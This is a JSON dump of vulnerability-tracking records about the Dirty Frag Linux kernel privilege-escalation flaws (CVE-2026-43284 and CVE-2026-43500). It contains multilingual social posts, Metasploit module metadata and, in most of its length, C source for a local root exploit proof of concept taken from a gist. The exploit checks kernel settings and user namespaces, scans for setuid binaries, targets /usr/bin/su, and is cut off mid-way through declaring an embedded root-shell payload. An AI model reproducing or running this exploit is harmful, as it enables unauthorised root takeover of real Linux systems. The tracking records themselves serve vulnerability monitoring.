\u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0443\u044e \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f.\n\n\u041f\u0440\u0438 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432 \u0430\u043f\u0440\u0435\u043b\u0435\u00a0\u0432 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430\u00a0\u0435\u0449\u0435 \u043e\u0434\u043d\u0443 EoP-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c (\u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Pack2TheRoot) \u0432 \u0434\u0435\u043c\u043e\u043d\u0435 PackageKit, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u043e\u0439 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u0434\u0435\u0441\u044f\u0442\u0438 \u043b\u0435\u0442.", "creation_timestamp": "2026-05-14T14:01:34.000000Z"}, {"uuid": "454811b6-19e1-4c26-9644-659a9ed3da60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mlw3wxs6rk2z", "content": "Patching Dirty Frag (CVE-2026-43284/CVE-2026-43500) on Oracle Linux? This script works. But after you patch, you need to understand the next 0-day. Read more -> tinyurl.com/b8hnx77h", "creation_timestamp": "2026-05-15T19:49:37.364800Z"}, {"uuid": "90ce62b7-9625-495f-8f5e-966b6e26e674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlwshvs3sk2v", "content": "Top 3 CVE for last 7 days:\nCVE-2026-43284: 90 interactions\nCVE-2026-43500: 71 interactions\nCVE-2026-42511: 56 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-42897: 36 interactions\nCVE-2026-20182: 13 interactions\nCVE-2026-42945: 12 interactions\n", "creation_timestamp": "2026-05-16T02:32:20.730258Z"}, {"uuid": "d838d1a3-af9c-43b5-a058-b4c5a1728639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43500", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mmbp6a4fv22r", "content": "\ud83d\udce2 Dirty Frag : deux vuln\u00e9rabilit\u00e9s Linux (CVE-2026-43284 et CVE-2026-43500) permettent une \u00e9l\u00e9vation de privil\u00e8ge\u2026\ud83d\udcdd \u2026\nhttps://cyberveille.ch/posts/2026-05-20-dirty-frag-deux-vulnerabilites-linux-cve-2026-43284-et-cve-2026-43500-permettent-une-elevation-de-privileges-root/ #CVE_2026_43284 #Cyberveil\u2026", "creation_timestamp": "2026-05-20T10:30:23.037492Z"}, {"uuid": "bc9c8a97-42cd-4716-a5ea-f825887e81b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "published-proof-of-concept", "source": "Telegram/pekQneQSghJS9ruSll4_086gjVL0B0HejJCeE2Ffiq4w67c", "content": "", "creation_timestamp": "2026-05-21T23:00:10.000000Z"}, {"uuid": "2d295cf9-75fd-4e2c-879f-bc63061f6a8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2026_43500_dirty_frag.rb", "content": "{\"actions\": [], \"aliases\": [], \"arch\": \"cmd\", \"author\": [\"Hyunwoo Kim\", \"Giovanni Heward\"], \"autofilter_ports\": [], \"autofilter_services\": [], \"check\": true, \"default_credential\": false, \"description\": \"CVE-2026-43500 exploits a memory-corruption vulnerability in the Linux kernel's RxRPC\\n authentication subsystem (rxkad). When a crafted DATA packet is delivered to an AF_RXRPC\\n socket configured with an attacker-controlled rxkad session key, the kernel's\\n rxkad_verify_packet_1() function performs an in-place 8-byte pcbc(fcrypt) decryption\\n directly on the page-cache page referenced by the splice offset. Because the decryption\\n mutates the page in-place without marking it dirty, the corrupted in-memory view is\\n immediately visible to all processes reading from the page cache. This allows a local\\n attacker to corrupt the in-memory contents of a SUID binary and escalate privileges to root.\", \"disclosure_date\": \"2026-05-08\", \"fullname\": \"exploit/linux/local/cve_2026_43500_dirty_frag\", \"is_install_path\": true, \"mod_time\": \"2026-05-21 11:49:08 +0000\", \"name\": \"rxkad Page-Cache Write via CVE-2026-43500\", \"needs_cleanup\": true, \"notes\": {\"Reliability\": [\"repeatable-session\"], \"SideEffects\": [\"artifacts-on-disk\"], \"Stability\": [\"crash-os-down\"]}, \"path\": \"/modules/exploits/linux/local/cve_2026_43500_dirty_frag.rb\", \"platform\": \"Linux,Unix\", \"post_auth\": false, \"rank\": 400, \"ref_name\": \"linux/local/cve_2026_43500_dirty_frag\", \"references\": [\"CVE-2026-43500\", \"URL-https://github.com/V4bel/dirtyfrag\"], \"rport\": null, \"session_types\": [\"shell\", \"meterpreter\"], \"targets\": [\"Auto\"], \"type\": \"exploit\"}", "creation_timestamp": "2026-05-21T10:50:23.000000Z"}, {"uuid": "b0ae9072-c14f-4560-9285-70fb403d6338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmhyt66qb227", "content": "\u30a2\u30af\u30c6\u30a3\u30d6\u653b\u6483\uff1aLinux\u306eDirty Frag\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u4fb5\u5bb3\u5f8c\u306e\u30ea\u30b9\u30af\u304c\u62e1\u5927\n\n\u300cDirty Frag\u300d\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u3001\u65b0\u305f\u306b\u660e\u3089\u304b\u306b\u306a\u3063\u305fLinux\u306e\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001esp4\u3001esp6\uff08CVE-2026-43284\uff09\u3001rxrpc\uff08CVE-2026-43500\uff09\u306a\u3069\u306e\u8106\u5f31\u306a\u30ab\u30fc\u30cd\u30eb\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u304a\u3088\u3073\u30e1\u30e2\u30ea\u30d5\u30e9\u30b0\u30e1\u30f3\u30c8\u51e6\u7406\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3092\u4ecb\u3057\u3066\u3001\u6a29\u9650\u306e\u306a\u3044\u30e6\u30fc\u30b6\u30fc\u304b\u3089root\u6a29\u9650\u3078\u306e\u6607\u683c\u304c\u53ef\u80fd\u306b\u306a\u308a\u307e\u3059\u3002\u516c\u958b\u3055\u308c\u305f\u5831\u544a\u3084\u6982\u5ff5\u5b9f\u8a3c\u6d3b\u52d5\u304b\u3089\u3001\u3053\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u5f93\u6765\u306e\u7af6\u5408\u72b6\u614b\u306b\u4f9d\u5b58\u3059\u308bLinux\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u624b\u6cd5\u3088\u308a\u3082\u4fe1\u983c\u6027\u306e\u9ad8\u3044\u6a29\u9650\u6607\u683c\u3092\u5b9f\u73fe\u3059\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u3066\u3044\u308b...", "creation_timestamp": "2026-05-22T22:39:13.177285Z"}, {"uuid": "243d205f-1ee6-4f97-bc6e-98d92fc9a35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "published-proof-of-concept", "source": "Telegram/QUF9weJLwCd1qHdTEuhp0UyLZi4jvqqQc5vVfkezLkJSkiA", "content": "", "creation_timestamp": "2026-05-19T03:00:06.000000Z"}, {"uuid": "0d3be26e-b73f-4a22-b512-12916fb7d21c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/85248", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Dirtyfrag-go\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Koshmare-Blossom\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-21 15:55:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA Go implementation of dirtyfrag (CVE-2026-43284 / CVE-2026-43500)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-21T16:00:05.000000Z"}, {"uuid": "3509b0e6-24fa-4d1a-8eb8-32cfe41a18a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyr4kgoa2u", "content": "\ud83d\udd17 CVE : CVE-2025-54518, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:18.413608Z"}, {"uuid": "66c64564-ea96-4a4e-9c9e-58f35c5338cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmv6kqysopn2", "content": "Dirty Frag: a kernel zero-day vs. container and microVM sandboxes On May 7, Hyunwoo Kim (V4bel) disclosed Dirty Frag \u2014 two Linux kernel vulnerabilities (CVE-2026-43284 and CVE-2026-43500) that gi...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-28T04:26:27.500699Z"}, {"uuid": "a33a231b-aea3-4d29-9f58-276e517078f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/spynika/9c98aca892e18aff2b87d04aa69cc7d7", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef UDP_ENCAP\n#define UDP_ENCAP 100\n#endif\n#ifndef UDP_ENCAP_ESPINUDP\n#define UDP_ENCAP_ESPINUDP 2\n#endif\n#ifndef SOL_UDP\n#define SOL_UDP 17\n#endif\n\n#define ENC_PORT 4500\n#define SEQ_VAL 200\n#define REPLAY_SEQ 100\n#define PATCH_OFFSET 0\n#define PAYLOAD_LEN 192\n#define ENTRY_OFFSET 0x78\n#define TOTAL_SAS (PAYLOAD_LEN / 4)\n#define SPI_BASE 0xDEADBE10u\n\nstatic const char *g_target = \"/usr/bin/su\";\nstatic unsigned char g_backup[PAYLOAD_LEN];\nstatic int g_have_backup = 0;\n\nstatic int g_tty = 0;\nstatic int g_verbose = 0;\nstatic int g_setuid_count = 0;\nstatic int g_exploitable_count = 0;\n\n/* first instructions of embedded shell ELF at file offset 0x78 */\nstatic const uint8_t su_marker[8] = {\n\t0x31, 0xff, 0x31, 0xf6, 0x31, 0xc0, 0xb0, 0x6a,\n};\n\n#define C_RST \"\\033[0m\"\n#define C_DIM \"\\033[2m\"\n#define C_RED \"\\033[31m\"\n#define C_GRN \"\\033[32m\"\n#define C_YEL \"\\033[33m\"\n#define C_BLU \"\\033[34m\"\n#define C_MAG \"\\033[35m\"\n#define C_CYN \"\\033[36m\"\n#define C_WHT \"\\033[1;37m\"\n#define C_BOLD \"\\033[1m\"\n\n#define C(x) (g_tty ? (x) : \"\")\n\nstatic void print_banner(void)\n{\n\tprintf(\"\\n\");\n\tprintf(\"%s\", C(C_CYN));\n\tprintf(\" \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\");\n\tprintf(\" \u2551 SLEY - CVE-2026-43284 dirtyfrag PoC \u2551\\n\");\n\tprintf(\" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\");\n\tprintf(\"%s\\n\", C(C_RST));\n}\n\nstatic void status_line(const char *label, int ok, const char *detail)\n{\n\tprintf(\" %s[%s]%s %-22s\",\n\t C(C_DIM), ok ? \"+\" : \"-\", C(C_RST), label);\n\tif (detail && detail[0])\n\t\tprintf(\" %s%s%s\", ok ? C(C_GRN) : C(C_RED), detail, C(C_RST));\n\tprintf(\"\\n\");\n}\n\nstatic void phase_header(int n, const char *title)\n{\n\tprintf(\"%s\u250c\u2500[%s phase %d%s] %s%s\\n\",\n\t C(C_CYN), C(C_MAG), n, C(C_CYN), title, C(C_RST));\n}\n\nstatic int cfg_value_ok(const char *val, const char *expect)\n{\n\tif (!val || !*val)\n\t\treturn 0;\n\tif (strcmp(expect, \"ym\") == 0)\n\t\treturn val[0] == 'y' || val[0] == 'm';\n\treturn strcmp(val, expect) == 0;\n}\n\nstruct kconfig_req {\n\tconst char *key;\n\tconst char *expect;\n\tconst char *hint;\n\tchar val[32];\n\tint found;\n};\n\nstatic void scan_kconfig(FILE *f, struct kconfig_req *req, size_t nreq)\n{\n\tchar line[256];\n\n\tfor (size_t i = 0; i < nreq; i++) {\n\t\treq[i].val[0] = '\\0';\n\t\treq[i].found = 0;\n\t}\n\n\twhile (fgets(line, sizeof(line), f)) {\n\t\tfor (size_t i = 0; i < nreq; i++) {\n\t\t\tif (req[i].found)\n\t\t\t\tcontinue;\n\t\t\tsize_t klen = strlen(req[i].key);\n\t\t\tif (strncmp(line, req[i].key, klen) != 0 || line[klen] != '=')\n\t\t\t\tcontinue;\n\t\t\tconst char *v = line + klen + 1;\n\t\t\tsize_t n = strcspn(v, \"\\n\\r\");\n\t\t\tif (n >= sizeof(req[i].val))\n\t\t\t\tn = sizeof(req[i].val) - 1;\n\t\t\tmemcpy(req[i].val, v, n);\n\t\t\treq[i].val[n] = '\\0';\n\t\t\treq[i].found = 1;\n\t\t}\n\t}\n}\n\nstatic FILE *open_kconfig_gz(const char *src, int *via_popen)\n{\n\tstatic const char *cmds[] = {\n\t\t\"gzip -dc '%s' 2>/dev/null\",\n\t\t\"zcat '%s' 2>/dev/null\",\n\t\tNULL,\n\t};\n\tchar cmd[256];\n\n\tfor (int i = 0; cmds[i]; i++) {\n\t\tsnprintf(cmd, sizeof(cmd), cmds[i], src);\n\t\tFILE *f = popen(cmd, \"r\");\n\t\tif (f) {\n\t\t\t*via_popen = 1;\n\t\t\treturn f;\n\t\t}\n\t}\n\treturn NULL;\n}\n\nstatic FILE *open_kconfig_source(const char *release, char *label, size_t labellen,\n\t\t\t\t int *via_popen)\n{\n\tchar path[512];\n\tFILE *f;\n\n\t*via_popen = 0;\n\n\tsnprintf(path, sizeof(path), \"/boot/config-%s\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tsnprintf(path, sizeof(path), \"/lib/modules/%s/build/.config\", release);\n\tf = fopen(path, \"r\");\n\tif (f) {\n\t\tsnprintf(label, labellen, \"%s\", path);\n\t\treturn f;\n\t}\n\n\tif (access(\"/proc/config.gz\", R_OK) == 0) {\n\t\tf = open_kconfig_gz(\"/proc/config.gz\", via_popen);\n\t\tif (f) {\n\t\t\tsnprintf(label, labellen, \"/proc/config.gz\");\n\t\t\treturn f;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nstatic void close_kconfig(FILE *f, int via_popen)\n{\n\tif (!f)\n\t\treturn;\n\tif (via_popen)\n\t\tpclose(f);\n\telse\n\t\tfclose(f);\n}\n\nstatic int check_kernel_config(void)\n{\n\tstruct utsname uts;\n\tchar cfglabel[512];\n\tint via_popen = 0;\n\n\tif (uname(&uts) < 0) {\n\t\tstatus_line(\"uname\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tphase_header(1, \"kernel config preflight\");\n\n\tFILE *cfg = open_kconfig_source(uts.release, cfglabel, sizeof(cfglabel), &via_popen);\n\tif (!cfg) {\n\t\tstatus_line(\"config file\", 0, \"not found under /boot, /lib/modules, /proc\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s [!] WSL2: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr, \"%s [!] or: grep -E \\\"...\\\" /boot/config-%s%s\\n\\n\",\n\t\t C(C_YEL), uts.release, C(C_RST));\n\t\treturn -1;\n\t}\n\n\tprintf(\" %s\u2192%s %s%s%s\\n\\n\", C(C_DIM), C(C_RST), C(C_BLU), cfglabel, C(C_RST));\n\tstatus_line(\"config file\", 1, via_popen ? \"via gzip/zcat\" : \"plain text\");\n\n\tstruct kconfig_req req[] = {\n\t\t{ \"CONFIG_USER_NS\", \"y\", \"required =y\" },\n\t\t{ \"CONFIG_XFRM\", \"y\", \"required =y\" },\n\t\t{ \"CONFIG_INET_ESP\", \"ym\", \"required =m or =y\" },\n\t};\n\tsize_t nreq = sizeof(req) / sizeof(req[0]);\n\tint ok_all = 1;\n\n\tscan_kconfig(cfg, req, nreq);\n\n\tfor (size_t i = 0; i < nreq; i++) {\n\t\tint ok = req[i].found && cfg_value_ok(req[i].val, req[i].expect);\n\t\tchar detail[128];\n\t\tif (req[i].found)\n\t\t\tsnprintf(detail, sizeof(detail), \"= %s (%s)\", req[i].val, req[i].hint);\n\t\telse\n\t\t\tsnprintf(detail, sizeof(detail), \"missing (%s)\", req[i].hint);\n\t\tstatus_line(req[i].key, ok, detail);\n\t\tif (!ok)\n\t\t\tok_all = 0;\n\t}\n\n\tclose_kconfig(cfg, via_popen);\n\n\tprintf(\"\\n\");\n\tif (!ok_all) {\n\t\tfprintf(stderr, \"%s [!] kernel does not meet exploit requirements.%s\\n\", C(C_RED), C(C_RST));\n\t\tfprintf(stderr, \"%s [!] manual check: zcat /proc/config.gz | grep -E \\\"CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=\\\"%s\\n\\n\",\n\t\t C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"%s kernel options OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic void print_sysctl_val(const char *path, const char *name)\n{\n\tFILE *f = fopen(path, \"r\");\n\tif (!f)\n\t\treturn;\n\tchar val[64];\n\tif (!fgets(val, sizeof(val), f)) {\n\t\tfclose(f);\n\t\treturn;\n\t}\n\tval[strcspn(val, \"\\n\\r\")] = '\\0';\n\tprintf(\" %s%s%s = %s\\n\", C(C_DIM), name, C(C_RST), val);\n\tfclose(f);\n}\n\nstatic int check_userns_runtime(void)\n{\n\tphase_header(2, \"user namespace runtime check\");\n\tprintf(\" %s\u2192%s unshare(CLONE_NEWUSER | CLONE_NEWNET)%s\\n\\n\",\n\t C(C_DIM), C(C_RST), C(C_DIM));\n\n\tif (getuid() == 0) {\n\t\tstatus_line(\"privilege\", 0, \"running as root \u2014 use an unprivileged user for LPE\");\n\t\tfprintf(stderr, \"\\n%s [!] Exploit is meant to run as a normal user (uid != 0).%s\\n\\n\",\n\t\t C(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tpid_t pid = fork();\n\tif (pid < 0) {\n\t\tstatus_line(\"fork\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\tif (pid == 0) {\n\t\tif (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0)\n\t\t\t_exit(1);\n\t\t_exit(0);\n\t}\n\n\tint st;\n\tif (waitpid(pid, &st, 0) < 0) {\n\t\tstatus_line(\"waitpid\", 0, strerror(errno));\n\t\treturn -1;\n\t}\n\n\tint ok = WIFEXITED(st) && WEXITSTATUS(st) == 0;\n\tif (!ok) {\n\t\tstatus_line(\"unshare\", 0, \"Operation not permitted\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s [!] CONFIG_USER_NS=y in /boot/config does not guarantee unprivileged userns at runtime.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s [!] This host blocks user namespaces (common on hardened Ubuntu 22.04+ / enterprise VMs).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s [!] Changing the setuid target (su/sudo/pkexec) will not help \u2014 unshare must succeed first.%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tprintf(\"\\n %sRelevant sysctls on this host:%s\\n\", C(C_DIM), C(C_RST));\n\t\tprint_sysctl_val(\"/proc/sys/kernel/apparmor_restrict_unprivileged_userns\",\n\t\t\t\t \"kernel.apparmor_restrict_unprivileged_userns\");\n\t\tprint_sysctl_val(\"/proc/sys/kernel/unprivileged_userns_clone\",\n\t\t\t\t \"kernel.unprivileged_userns_clone\");\n\t\tprint_sysctl_val(\"/proc/sys/user/max_user_namespaces\",\n\t\t\t\t \"user.max_user_namespaces\");\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s [!] Lab only (as root): sysctl -w kernel.apparmor_restrict_unprivileged_userns=0%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s [!] Without userns: this PoC cannot run (see CVE-2026-43500 rxrpc variant).%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\n\tstatus_line(\"unshare\", 1, \"user+net namespace available\");\n\tprintf(\"%s runtime userns check OK.%s\\n\\n\", C(C_GRN), C(C_RST));\n\treturn 0;\n}\n\nstatic int skip_tree(const char *path)\n{\n\treturn strcmp(path, \"/proc\") == 0 ||\n\t strcmp(path, \"/sys\") == 0 ||\n\t strcmp(path, \"/dev\") == 0 ||\n\t strcmp(path, \"/run\") == 0;\n}\n\nstatic int target_is_exploitable(const char *path)\n{\n\tstruct stat st;\n\n\tif (stat(path, &st) < 0 || !S_ISREG(st.st_mode))\n\t\treturn 0;\n\tif (!(st.st_mode & S_ISUID))\n\t\treturn 0;\n\tif (access(path, R_OK | X_OK) != 0)\n\t\treturn 0;\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0)\n\t\treturn 0;\n\tclose(fd);\n\treturn 1;\n}\n\nstatic int probe_target(const char *path, char *why, size_t whylen)\n{\n\tstruct stat st;\n\n\tif (stat(path, &st) < 0) {\n\t\tsnprintf(why, whylen, \"missing (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (!S_ISREG(st.st_mode)) {\n\t\tsnprintf(why, whylen, \"not a regular file\");\n\t\treturn -1;\n\t}\n\tif (!(st.st_mode & S_ISUID)) {\n\t\tsnprintf(why, whylen, \"no setuid bit (mode %04o)\", st.st_mode & 07777);\n\t\treturn -1;\n\t}\n\tif (access(path, R_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not readable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tif (access(path, X_OK) != 0) {\n\t\tsnprintf(why, whylen, \"not executable (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tint fd = open(path, O_RDONLY);\n\tif (fd < 0) {\n\t\tsnprintf(why, whylen, \"open(O_RDONLY) denied (%s)\", strerror(errno));\n\t\treturn -1;\n\t}\n\tclose(fd);\n\twhy[0] = '\\0';\n\treturn 0;\n}\n\nstatic int setuid_walk(const char *path, const struct stat *st, int flag,\n\t\t struct FTW *ftw)\n{\n\t(void)ftw;\n\tif (flag == FTW_D && skip_tree(path))\n\t\treturn FTW_SKIP_SUBTREE;\n\n\tif (flag != FTW_F)\n\t\treturn 0;\n\n\tif (!S_ISREG(st->st_mode))\n\t\treturn 0;\n\tif (!(st->st_mode & S_ISUID))\n\t\treturn 0;\n\n\tg_setuid_count++;\n\tint exploitable = target_is_exploitable(path);\n\tif (exploitable)\n\t\tg_exploitable_count++;\n\n\tint is_target = (strcmp(path, g_target) == 0);\n\tconst char *color = exploitable ? C(C_GRN) : C(C_YEL);\n\tconst char *badge = exploitable ? \"[+]\" : \"[~]\";\n\n\tprintf(\" %s%02d%s %s%s%s %s%s%s%s\\n\",\n\t C(C_DIM), g_setuid_count, C(C_RST),\n\t color, badge, C(C_RST), path,\n\t is_target ? \" \u2190 target\" : \"\",\n\t exploitable ? \"\" : \" (visible, not usable)\",\n\t C(C_RST));\n\treturn 0;\n}\n\nstatic int scan_setuid_binaries(void)\n{\n\tphase_header(3, \"setuid binary scan\");\n\tprintf(\" %s\u2192%s find / -perm -4000 -type f 2>/dev/null%s\\n\\n\",\n\t C(C_DIM), C(C_RST), C(C_DIM));\n\n\tg_setuid_count = 0;\n\tg_exploitable_count = 0;\n\tint rc = nftw(\"/\", setuid_walk, 32, FTW_PHYS | FTW_MOUNT);\n\n\tprintf(\"\\n\");\n\tif (rc != 0 && rc != EACCES) {\n\t\tstatus_line(\"nftw\", 0, strerror(rc > 0 ? rc : errno));\n\t}\n\tif (g_setuid_count == 0) {\n\t\tstatus_line(\"setuid\", 0, \"no SUID binaries found\");\n\t\treturn -1;\n\t}\n\tprintf(\"%s found %d setuid binaries, %d exploitable (readable + openable).%s\\n\",\n\t g_exploitable_count ? C(C_GRN) : C(C_YEL),\n\t g_setuid_count, g_exploitable_count, C(C_RST));\n\tif (g_exploitable_count == 0) {\n\t\tfprintf(stderr,\n\t\t\t\"\\n%s [!] SUID files are visible but not readable \u2014 typical on shared hosting (CageFS/cPanel).%s\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\tfprintf(stderr,\n\t\t\t\"%s [!] This exploit must open the target for read (splice). No usable target on this account.%s\\n\\n\",\n\t\t\tC(C_YEL), C(C_RST));\n\t\treturn -1;\n\t}\n\tprintf(\"\\n\");\n\treturn 0;\n}\n\n// minimal x86_64 root-shell ELF, entry=0x400078\n// setgid(0); setuid(0); execve(\"/bin/sh\", NULL, [\"TERM=xterm\",NULL]) \nstatic const unsigned char shell_elf[PAYLOAD_LEN] = 